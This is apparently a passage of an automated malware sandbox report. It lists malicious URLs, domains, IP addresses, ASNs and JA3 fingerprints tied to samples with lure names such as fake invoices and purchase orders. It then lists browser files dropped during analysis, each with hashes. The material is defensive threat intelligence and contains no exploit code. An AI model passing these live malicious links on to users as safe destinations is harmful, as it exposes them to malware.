	http://gmai.com	Get hash	malicious	Browse	p274639.infopicked.com/adServe/domainClick?ai=wTeBxKdiv_bj6z-4DR5E6xEoCdmKM2i2itqUFM3cxKZYM31tGvFshRVBfwgcwSIiaJSoHKlvPxdNp7vy8YXGsMns6Df7oRybsY9D8FpX5xXXwFLieH0IEz_o6s7g2k6EolaQUUnA7tx74PqtXJ6yjKWCfhwmY7tiPzqQd_9c7Nz7_deqVUfhKj9LOjAbBU0w9s1FJjK7XdqfipjGQI8NYSPScuAGqUxOu5W03dkQwtz-1BBzH34Ghx8OeU68Sh-0qMisWwsnsRTFQydG-o1iiY0bYtXdmST4t339P0t9BdbFMaxCA71Y2ZKLb00dKXPsXz3e5THWm8NLvU4DgzxU7oELQUCi9EwvEu0xav9AhnNtSlTzAXMMaK-E3pdZNPtrmvcKloq3ljx72dgE1EqN18XAlvPipFFdLRyeNHYRonzxoHMJAvHLEx4O86l9TsgMB8kLlj2YWOD6kJHYP0Z1xw8YwXeup9uWFBsaz2ZtXf7UsLWtjriNqAzx4ryjhh5cUz58YyNIMKjMdaMSZO0oovTfS1nQkidSOTYMxMWpRMSrecONlSTMew0oepz2Zi4ecsHBbCHLXfbIzzh0hp6ogG1OROAK-90QEdFQmYDGFbwCvLHM1MhvxQM-Jr3Q9J-0-T0AvjbOx9FD-IoRiWjmF-WJdLgktdb-Bry3DbhZYzCKsmr293i_2kv7EJ8xQviaeyZeB4t_sup98-6a8J6sXvu6GrQUy2lUDwHvy-FgMa2dJRr0Y4699nHYG0ECC42CTtTDUUm7QlCOF0SokHo2PZeYO9hdbD2Gn6oVmfmCmc-q0T2xsmJwnBfZ8RtWPEH2SnZADPOdLz_p-OGBQW3exAhKJncPyYXssKbYd4jRL3fz-AbClJeve1IAxxj8fbHTscWi84ZIOk0qJeEuaLJ-WEdDYOEm2_ns-Cm35MG9zEITCssQBo5b-J90l2Jq1JkDHlQN2ppG_WR-ZYbsoV1-iQ&ui=PmRMc57CnhbRNq-TBmz5rmvi5v6ZZrF7dLiTNq3P25qokS0sVeF3Fry_qNuucoukvpC3j9OzjMwCwDxGb5zVq_3RdaMKw61U5oZDpdwX-vChk6YI0eMu_tzwOsQ3jFPU&si=1&oref=b5cb62647ccd822d6f8e50f923074cca&rb=9MhxuiNtoYc&rr=4
	http://gmai.com	Get hash	malicious	Browse	p274639.infopicked.com/adServe/domainClick?ai=wTeBxKdiv_bj6z-4DR5E6xEoCdmKM2i2itqUFM3cxKZYM31tGvFshRVBfwgcwSIiaJSoHKlvPxdNp7vy8YXGsMns6Df7oRybsY9D8FpX5xXXwFLieH0IEz_o6s7g2k6EolaQUUnA7tx74PqtXJ6yjKWCfhwmY7tiPzqQd_9c7Nz7_deqVUfhKj9LOjAbBU0w9s1FJjK7XdqfipjGQI8NYSPScuAGqUxOu5W03dkQwtz-1BBzH34Ghx8OeU68Sh-0qMisWwsnsRTFQydG-o1iiY0bYtXdmST4t339P0t9BdbFMaxCA71Y2ZKLb00dKXPsXz3e5THWm8NLvU4DgzxU7oELQUCi9EwvEu0xav9AhnNtSlTzAXMMaK-E3pdZNPtrmvcKloq3ljx72dgE1EqN18XAlvPipFFdLRyeNHYRonzxoHMJAvHLEx4O86l9TsgMB8kLlj2YWOD6kJHYP0Z1xw8YwXeup9uWFBsaz2ZtXf7UsLWtjriNqAzx4ryjhh5cUz58YyNIMKjMdaMSZO0oovTfS1nQkidSOTYMxMWpRMSrecONlSTMew0oepz2Zi4ecsHBbCHLXfbIzzh0hp6ogG1OROAK-90QEdFQmYDGFbwCvLHM1MhvxQM-Jr3Q9J-0-T0AvjbOx9FD-IoRiWjmF-WJdLgktdb-Bry3DbhZYzCKsmr293i_2kv7EJ8xQviaeyZeB4t_sup98-6a8J6sXvu6GrQUy2lUDwHvy-FgMa2dJRr0Y4699srbw9mtZgrjyUIODweMYzSOF0SokHo2PZeYO9hdbD2Gn6oVmfmCmc-q0T2xsmJwnBfZ8RtWPEH2SnZADPOdLz_p-OGBQW3exAhKJncPyYXssKbYd4jRL3fz-AbClJeve1IAxxj8fbHTscWi84ZIOk0qJeEuaLJ-WEdDYOEm2_ns-Cm35MG9zEITCssQBo5b-J90l2Jq1JkDHlQN2ppG_WR-ZYbsoV1-iQ&ui=PmRMc57CnhbRNq-TBmz5rmvi5v6ZZrF7dLiTNq3P25qokS0sVeF3FtUhiXJXLsYxMhFeZ6GzpbcHO5T_IzFmDsk2mKOvgam7KNx7DEtdwqyzvQ01XOfnLUDBLVV8fyfO&si=1&oref=b5cb62647ccd822d6f8e50f923074cca&rb=9MhxuiNtoYc&rr=4
	https://www.dropbox.com/l/AACILqMf9nyLCBAtI7us4fP05O8j3-IIsZk	Get hash	malicious	Browse	p201298.infopicked.com/adServe/domainClick?ai=tc1rih9sOqNfP1gUl40WUyxE1tL35KQG6mcDWb1ymyFyGbZwcjod19w4XXFDhRyJM_vdhK8fOfximboYDKvIMRNecs-9vJK1f_1vyTLYjVsoLuBAIS3oVWWp__riXRnq0DWdzhFkQSpCpWAyb0MJAlWEgquv7OhpYlZ0CBoMUA4lO7oBdjPsrriNg4LYnwwf4nPYRZQZH5IO9LAo7hxx0WQBCYiu7z845W7li_6fZH-9MsT1-H1cyo4XRKiQejY9l5g72F1sPYafqhWZ-YKZz6rRPbGyYnCcF9nxG1Y8QfZKdkAM850vP-n44YFBbd7ECEomdw_Jheywpth3iNEvd_P4BsKUl697UgDHGPx9sdMYzX4lBaMB8B6zoNOefoPFbWnaHeEFBuddA-e5aUFqZsS33aYyBWDD&ui=PmRMc57CnhZNx2-o7kzoFGvi5v6ZZrF7dLiTNq3P25qokS0sVeF3FgIfyWa1KjRFD7U05ElUS1733VMX4248OM9CgRUyBbBdvbiQ9YQspaHvEpnNjBMu8mVfwbM1mIV5&si=1&oref=b9812287633182c823f05a44aaa5a5eb&rb=E-qvs9aXu7s&rr=1
	http://youbue.com	Get hash	malicious	Browse	p185689.infopicked.com/adServe/domainClick?ai=cfld0oJoDcfR6uRdi2bghJMxDaNza9axH5GeQZZdaknyu9xZSapW45CZLyIu0yaAozbmsFxFiHlLE1DkoAyS7GGlpT_n3RR6JKcLhbEriZaMPAToK0OwtWc0_115PM2yd6H1vsC5A5N3KCmXEpa9xDVwJ2AuHbWvS8UkI2fN5XgXSTtSOLKFouPwMqcAj9tGewOJi7aKKtVx6VzkrXHm4ZpE3o1qAGpt4Ue-5Puw8BoFa_O5B8sBWozh5QbZr1mziJQ40hBXaEx6MH_dBa99HLGQOP0mci5vWX8XuNe16w0Znk547BHwU6Aprjd9r84Nz6nG00oI8rXKZ9W4qhNzZno-yipZmoTqmrmzBEgdyX51SPFWU0glHP64MgSsNz7KRYjMFTrjA6ydN6e3yPsONM0HlBhJldqywdR7Gxhuu7lbfjtMYSVpTo58yDqK1VDAIRa_gBfpfzTlpJu08XLX_Wcd7IqW7G0sBp8N1Cqk3GlqgEE0f5Fjh8XnLiFpVgC8Bvf4RIcbQkf8MYSEgYCwvK1w2OJ6G08KYlZ0CBoMUA4lO7oBdjPsrq3stypAi2koDvSwKO4ccdGXhKalCW5RUrVIXgB_j3aH_aiUWGLT8ccmYIJGi_TSUWTfxfs1Jb0VofB33BW-m9pDG-A6O8vm_g3tKy_heZIpllemAWTaPnh7ytE4oS_3pJL4KnOOYIJFKRuNOcPQlyhauS4SJm9wQoLrtg_raixpUqyH51yNysSaoC1U792WdxbRh5WhN0Axej_wmAiUbeoWBGu3Yx722HW3MQ4Jbibrdzc61NAyifwfDHtJM0bUXpBKcHBt4N9C&ui=PmRMc57CnhbuNHKw2Y29rWvi5v6ZZrF7dLiTNq3P25qokS0sVeF3FtBbnKBA5pdUJ5HVAFtDQmkDiPIg2AA2nlODVyxneIBUBwPLYSKCGVrRKDhQUiZ6IazVYlgrB55e&si=1&oref=615fcf24195c35fa445097229c9fef41&rb=4rgeS0SmgPg&rr=1
	http://bejuy.com/?bejuy	Get hash	malicious	Browse	p226681.infopicked.com/adServe/domainClick?ai=sDgLTWBy6qiKJfoyyAyxz5lTec1R-G0hfbiK18fJJ8N8PCREsrxRP2o8pKmc8FyM25_rtcFU56saYvAdoGosa76GulJZdBUf4dUnXWOc4W9U5jDDOEjXTm8TXQYarsc_D4cDfGPOorKHic3Byin_EYU9LqzvQyaatri_vDCiKgYCvLHM1MhvxQM-Jr3Q9J-0-T0AvjbOx9FD-IoRiWjmF-WJdLgktdb-Bry3DbhZYzDWEvsxfr1WQk-THV8f6WcI-vie8-wq9A05jDCok9YMrGP7DLX1xSsUlJxRbMtshDY3nKRnCr1_SRSaWJJddIjta_lqISjeZ5nCF7WIMxlUWr7AdIrib2gOJf4yBNRlqxdPnEhIaw2zsRJHJzdDv6O5-zfUS8nVU04fFcxJ0StShp2s0_34CATUuHZzeSQTgkyFv_aZQC5A4r4FDOdw858tImbOeXz24ZVRY0XLI-w26tWjri88Beg6ZonWe_Vtl9GtFLC8pMLsUA5RUDuR6cw8k5rIqlNi8oiNOntyGiJLUJkP5LNliGtG&ui=PmRMc57CnhboFEyXhZ8tO2vi5v6ZZrF7dLiTNq3P25qokS0sVeF3FqdDzduyOn70mxugia8gbQtshfZZwD5uxjTSbLQEFK6iLvDPG3aKFMRHjQhY9W1eMf4MnGiTkT87&si=1&oref=4dc86188f9b41fed212768d74d5ef8bf&rb=8pDSrleFLcU&rr=1
	http://advaitatoursandtravels.com/8SNtEW956qlZV2h/yh/en/?i=2302771	Get hash	malicious	Browse	clksite.com/adServe/banners?tid=204915_380011_1&pause=5
	http://exe.io/d08u	Get hash	malicious	Browse	p221722.clksite.com/adServe/banners?tid=IF1CUTURLS_DI

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
menehleibe.com	o402ek2m.php_l=yuptb1.exe	Get hash	malicious	Browse	46.29.165.55
gertrk.com	bd.exe	Get hash	malicious	Browse	168.119.139.96
	http://gmai.com	Get hash	malicious	Browse	168.119.139.96
	7IEK8G8P67.js	Get hash	malicious	Browse	168.119.139.96

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
WEBAIR-INTERNETUS	FS9MDxxWbl.exe	Get hash	malicious	Browse	173.239.8.164
	ttWjYomGYN	Get hash	malicious	Browse	67.55.75.178
	9JzK89dRiaBYTuN.exe	Get hash	malicious	Browse	74.206.228.78
	Purchase Order.exe	Get hash	malicious	Browse	173.239.8.164
	dqVPlpmWYt.exe	Get hash	malicious	Browse	67.55.90.108
	WitNwYLlo9.exe	Get hash	malicious	Browse	213.247.47.190
	Consignment Document PL&BL Draft.exe	Get hash	malicious	Browse	173.239.5.6
	New order 201534.pdf.exe	Get hash	malicious	Browse	173.239.8.164
	payment_proof_Copy,pdf.exe	Get hash	malicious	Browse	213.247.47.190
	Shipment of your goods.exe	Get hash	malicious	Browse	173.239.5.6
	OUTSTANDING PAYMENT REMINDER.exe	Get hash	malicious	Browse	173.239.8.164
	Request for Quotation.exe	Get hash	malicious	Browse	173.239.5.6
	PROFORMA INVOICE-INV393456434.pdf.exe	Get hash	malicious	Browse	173.239.8.164
	SecuriteInfo.com.Trojan.Downloader.JVDL.21302.xls	Get hash	malicious	Browse	213.247.46.53
	SecuriteInfo.com.Trojan.Downloader.JVDL.21302.xls	Get hash	malicious	Browse	213.247.46.53
	SecuriteInfo.com.Trojan.Downloader.JVDL.7463.xls	Get hash	malicious	Browse	213.247.46.53
	SecuriteInfo.com.Trojan.Downloader.JVDL.11267.xls	Get hash	malicious	Browse	213.247.46.53
	SecuriteInfo.com.Trojan.Downloader.JVDL.21562.xls	Get hash	malicious	Browse	213.247.46.53
	SecuriteInfo.com.Trojan.Downloader.JVDL.7463.xls	Get hash	malicious	Browse	213.247.46.53
	SecuriteInfo.com.Trojan.Downloader.JVDL.11267.xls	Get hash	malicious	Browse	213.247.46.53
SOFTLAYERUS	i686	Get hash	malicious	Browse	169.44.25.107
	QcXQmNSaSp	Get hash	malicious	Browse	150.239.180.42
	arm	Get hash	malicious	Browse	169.60.29.123
	ccvgtVRQBx	Get hash	malicious	Browse	169.53.144.124
	I6l48v5NQD	Get hash	malicious	Browse	169.49.82.236
	arm	Get hash	malicious	Browse	174.132.218.163
	fk8YZet4QU	Get hash	malicious	Browse	173.193.99.115
	loligang.arm7	Get hash	malicious	Browse	173.193.99.105
	sora.arm7	Get hash	malicious	Browse	74.53.31.137
	FHrO8Nb8X6.exe	Get hash	malicious	Browse	159.8.229.237
	jKira.arm7	Get hash	malicious	Browse	169.45.241.19
	h9a1NEWEeR	Get hash	malicious	Browse	207.218.215.108
	Kp6SDRr8xd	Get hash	malicious	Browse	173.193.175.220
	BqfM9JwIC5	Get hash	malicious	Browse	161.159.29.133
	O83wubYGMU.exe	Get hash	malicious	Browse	216.250.97.121
	OnRFDWqdnF	Get hash	malicious	Browse	150.239.179.11
	2vMBHaZcM5	Get hash	malicious	Browse	174.122.77.118
	iYUfv1bE48	Get hash	malicious	Browse	169.62.46.57
	sora.arm7	Get hash	malicious	Browse	74.54.2.125
	OffboardDiagLauncher.exe	Get hash	malicious	Browse	150.238.42.13

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
9e10692f1b7f78228b2d4e424db3a98c	XdChiA1SFt.dll	Get hash	malicious	Browse	173.192.101.24 142.250.102.106 168.119.139.96
	NCgbWJd3YR.dll	Get hash	malicious	Browse	173.192.101.24 142.250.102.106 168.119.139.96
	090921.dll	Get hash	malicious	Browse	173.192.101.24 142.250.102.106 168.119.139.96
	jIUM4pyxrk.dll	Get hash	malicious	Browse	173.192.101.24 142.250.102.106 168.119.139.96
	86pvB9G0yi.dll	Get hash	malicious	Browse	173.192.101.24 142.250.102.106 168.119.139.96
	WiJ2Xvsdgb.dll	Get hash	malicious	Browse	173.192.101.24 142.250.102.106 168.119.139.96
	c5KOVut4bT.dll	Get hash	malicious	Browse	173.192.101.24 142.250.102.106 168.119.139.96
	q5tuVZ7Ef1.dll	Get hash	malicious	Browse	173.192.101.24 142.250.102.106 168.119.139.96
	cfxqb9BOeT.dll	Get hash	malicious	Browse	173.192.101.24 142.250.102.106 168.119.139.96
	qPu2NHTCnf.dll	Get hash	malicious	Browse	173.192.101.24 142.250.102.106 168.119.139.96
	lKS018CkVe.dll	Get hash	malicious	Browse	173.192.101.24 142.250.102.106 168.119.139.96
	caDeEx.dll	Get hash	malicious	Browse	173.192.101.24 142.250.102.106 168.119.139.96
	exPlEx.dll	Get hash	malicious	Browse	173.192.101.24 142.250.102.106 168.119.139.96
	plDeCa.dll	Get hash	malicious	Browse	173.192.101.24 142.250.102.106 168.119.139.96
	QPBcY04qKa.dll	Get hash	malicious	Browse	173.192.101.24 142.250.102.106 168.119.139.96
	nextUsDe.dll	Get hash	malicious	Browse	173.192.101.24 142.250.102.106 168.119.139.96
	prevPwDe.dll	Get hash	malicious	Browse	173.192.101.24 142.250.102.106 168.119.139.96
	currCurrPl.jpg.dll	Get hash	malicious	Browse	173.192.101.24 142.250.102.106 168.119.139.96
	c4DWctbDYR.dll	Get hash	malicious	Browse	173.192.101.24 142.250.102.106 168.119.139.96
	090921.dll	Get hash	malicious	Browse	173.192.101.24 142.250.102.106 168.119.139.96

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{F14FAF2F-15AF-11EC-90E5-ECF4BB2D2496}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	29272
Entropy (8bit):	1.7680750665735105
Encrypted:	false
SSDEEP:	48:IwLGcpryGwpL3G/ap8JGIpcaQGvnZpva1GoHRqp9aGGo4zX1pmNGWHz71MGWHBTw:rRZ6Z/27WGt2AfszX1MHPCIifT9cDB
MD5:	6718428E930008E34240856F43C47A5E
SHA1:	7D88F1553C8394FB762C236D1AD3B9193D877F84
SHA-256:	57819E6BE034067D0BA3C30AB272050D20D41CCE457DA3444171DC64E155FCD1
SHA-512:	D6371F4BD026975901D47B6851D1ED69EB43FB42FF5BD6CE422D4E768337CBD2E41FDA0454D68C4FF37E7D6CBC95F7E57E9AE396AECC06D747E3327A629A6766
Malicious:	false
Reputation:	low
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{F14FAF31-15AF-11EC-90E5-ECF4BB2D2496}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	33596
Entropy (8bit):	1.7318997073805276
Encrypted:	false
SSDEEP:	192:rOZRQh6TkMjR29W+MaguzrMg2oyEcdOy8Og:ram8Y+AUXXYQ+//
MD5:	30628B54E4C2F4AABCD1C1C35E73BA0E
SHA1:	894C3CABAB8EC9C63069758EE70965C511A5A10C
SHA-256:	6B8FFAC8A720BD8D337017290A85B5ADEAD8AF2B0FE9B204313462235096CB5A
SHA-512:	91628C946C5395DB58586ECBF60E0F06BC8B7081475D47F251C5F2B5E5884A820DB7D93BEFBAE2DEF971C873E4BBAF26962FFE7175B6216100756E8E1BCFA6E6
Malicious:	false
Reputation:	low
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-17529550060\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	659
Entropy (8bit):	5.103204027570093
Encrypted:	false
SSDEEP:	12:TMHdNMNxOEbTDnWimI002EtM3MHdNMNxOEbTDnWimI00OVbVbkEtMb:2d6NxOOSZHKd6NxOOSZ7V6b
MD5:	E6C2BC50F8E60C51EFC54CA61B9EC0BA
SHA1:	3DB36280067C68EA8AF261DD26BA7DE0AE2E85AB
SHA-256:	930556467F85BEF61075091DE2224E1A60796B1465E63D748BE8959B005C3B94
SHA-512:	CCD5CE608075AC84E325C5A9ED3F03151ED94FAC7E374156CB287C44D507E8B614087DE473911B2A1BB636B14049F858BECD772A32FC84BCC4CDCA2550CF1B00
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0xc9954168,0x01d7a9bc</date><accdate>0xc9954168,0x01d7a9bc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0xc9954168,0x01d7a9bc</date><accdate>0xc9954168,0x01d7a9bc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-18270793970\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	656
Entropy (8bit):	5.060030324837212
Encrypted:	false
SSDEEP:	12:TMHdNMNxe2ktBkB4nWimI002EtM3MHdNMNxe2ktBkB4nWimI00OVbkak6EtMb:2d6NxrKBkB4SZHKd6NxrKBkB4SZ7VAan
MD5:	E26BA9F3A760091B3183D1F41CDC98C4
SHA1:	86884579127B6B404F35859BAB1F0BF8E14BC98A
SHA-256:	EACDDFE80072986877C90B4C34CE72DE4CD1AC4BC0D38CF50A3E88B33CC2AFCD
SHA-512:	8A38E8DB918BF88B2E75DDF1653698FBD793B41624BEF49326BA00ADF008A41D2F4240FFFB774A4EB1A8950DF4DBDB80BB9320F8FD107D3BB28D6ED3B31B3CE4
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.amazon.com/"/><date>0xc98e1a9d,0x01d7a9bc</date><accdate>0xc98e1a9d,0x01d7a9bc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.amazon.com/"/><date>0xc98e1a9d,0x01d7a9bc</date><accdate>0xc98e1a9d,0x01d7a9bc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Amazon.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-21706820\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	665
Entropy (8bit):	5.122450678810792
Encrypted:	false
SSDEEP:	12:TMHdNMNxvLbTDnWimI002EtM3MHdNMNxvLbTDnWimI00OVbmZEtMb:2d6NxvPSZHKd6NxvPSZ7Vmb
MD5:	905FFB93378DC31AC2DD0A6F8DC342E7
SHA1:	2016CCDEAC7206B8B975E165084EB4623FED8DD7
SHA-256:	2749E37E02157835DB9CF9A1F79BB5F23C03B6E094E33862D71709B83C37ADBB
SHA-512:	C772F25E3C85A51C4B5D3C70F17E0C50398A099AA57746A4FC1E67485E53556A77680246BC74713F261A76EAC0791D8378878A80A8DBB523EC501649F502DC8F
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.wikipedia.com/"/><date>0xc9954168,0x01d7a9bc</date><accdate>0xc9954168,0x01d7a9bc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.wikipedia.com/"/><date>0xc9954168,0x01d7a9bc</date><accdate>0xc9954168,0x01d7a9bc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Wikipedia.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-4759708130\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	650
Entropy (8bit):	5.118921291916546
Encrypted:	false
SSDEEP:	12:TMHdNMNxibTDnWimI002EtM3MHdNMNxibTDnWimI00OVbd5EtMb:2d6NxMSZHKd6NxMSZ7VJjb
MD5:	6460C64D25542D88DAB4FCF81DA71778
SHA1:	676D82A03B0BF5C5DE83E5BCBBDCDEF506516758
SHA-256:	A22AA7D82C753E3C188A28FD08D19E4D81002135F2BFEBEB1F1A430BE57C8B1B
SHA-512:	B4494A57CC1FD186F7FE654BDE6EE5BB180ADD9DDC22C3E197BB9BB6CC5A3EA9CE3530B67C2BB3593CDDA8DA15E8D6D76A1F474A1A64EDDE83761022F6F78717
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.live.com/"/><date>0xc9954168,0x01d7a9bc</date><accdate>0xc9954168,0x01d7a9bc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.live.com/"/><date>0xc9954168,0x01d7a9bc</date><accdate>0xc9954168,0x01d7a9bc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Live.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-6757900\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	modified
Size (bytes):	659
Entropy (8bit):	5.1343683532362645
Encrypted:	false
SSDEEP:	12:TMHdNMNxhGwbTDnWimI002EtM3MHdNMNxhGwbTDnWimI00OVb8K075EtMb:2d6NxQySZHKd6NxQySZ7VYKajb
MD5:	8E92836C2D0581401653E8DE5C6B8738
SHA1:	CBAC5A797B78F7CB6DA7290A1062FBED2949213F
SHA-256:	F3FC6551AD678A4DF601F69273B5B5E83EC0F4B786D622B8E2936B1472B8E87A
SHA-512:	EFD3436C0CCA7BAF708695893047ED47C51281D01B2F7556342864946B671A22B4DABE64A3323EBA92CF8B7DE715560652DFB56B4182493B829144F5BFCA56A7
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0xc9954168,0x01d7a9bc</date><accdate>0xc9954168,0x01d7a9bc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0xc9954168,0x01d7a9bc</date><accdate>0xc9954168,0x01d7a9bc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-8760897390\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	656
Entropy (8bit):	5.107052953253313
Encrypted:	false
SSDEEP:	12:TMHdNMNx0nbTDnWimI002EtM3MHdNMNx0nbTDnWimI00OVbxEtMb:2d6Nx0DSZHKd6Nx0DSZ7Vnb
MD5:	84068C5AA2D27A5EA37F4986D9B215FC
SHA1:	885375A31C5CA66B7E30A0286DCED8161425B029
SHA-256:	A8DB220EA8C9068C18AF2503BC68A61749726B169C158174E476120A33D2EB89
SHA-512:	36E8EA1D95AF9BAACC43AB50690ABC02FB593B14D68F8287854C4C53FBCD2E8B8566A2219DAE529B62A5999ECE9BB62FA944A38971E7AC25AA481D6F7B46D69F
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.reddit.com/"/><date>0xc9954168,0x01d7a9bc</date><accdate>0xc9954168,0x01d7a9bc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.reddit.com/"/><date>0xc9954168,0x01d7a9bc</date><accdate>0xc9954168,0x01d7a9bc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Reddit.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20259167780\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	659
Entropy (8bit):	5.143005129532291
Encrypted:	false
SSDEEP:	12:TMHdNMNxxbTDnWimI002EtM3MHdNMNxxbTDnWimI00OVb6Kq5EtMb:2d6NxtSZHKd6NxtSZ7Vob
MD5:	D9A16E4485A714D44DE977C8989D70FB
SHA1:	5664A30464FDE79285274B3E5884EB222545171E
SHA-256:	DDCF95ECFE4AF66B5667C2A29DF770EF6489860FAC1FAE1AF83E32618C0BE95D
SHA-512:	B424B71F4C07942B988626CCF2E322CC45C4EB92DE95833AB9821C15D7AF08173671587FEC1D8B3AD4A15097B2D8FA569C90EE1A5846DEF4F0818F02AA811C36
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.nytimes.com/"/><date>0xc9954168,0x01d7a9bc</date><accdate>0xc9954168,0x01d7a9bc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.nytimes.com/"/><date>0xc9954168,0x01d7a9bc</date><accdate>0xc9954168,0x01d7a9bc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\NYTimes.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20332743330\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	662
Entropy (8bit):	5.119025965656811
Encrypted:	false
SSDEEP:	12:TMHdNMNxcbTDnWimI002EtM3MHdNMNxcbTDnWimI00OVbVEtMb:2d6NxWSZHKd6NxWSZ7VDb
MD5:	766F656BF3D12DFEE67986A2D3382BC5
SHA1:	1E3FFDA3E62935C74FDFD92F70B258CD59400550
SHA-256:	ED547F3FEA8A4834065CFA3B3BDD68EA8C1E20AB2771C1037C736E21DD00018C
SHA-512:	E0A76263B06A7F42B84B8B78DE9DAA8DCD0BA8D8C9558093DC14AD8F6DBB741F9EE0826E2728ECEA636265E650559C1E898E7B4A2B53BFB7490D434CAF8BB9BE
Malicious:	false
Reputation:	low
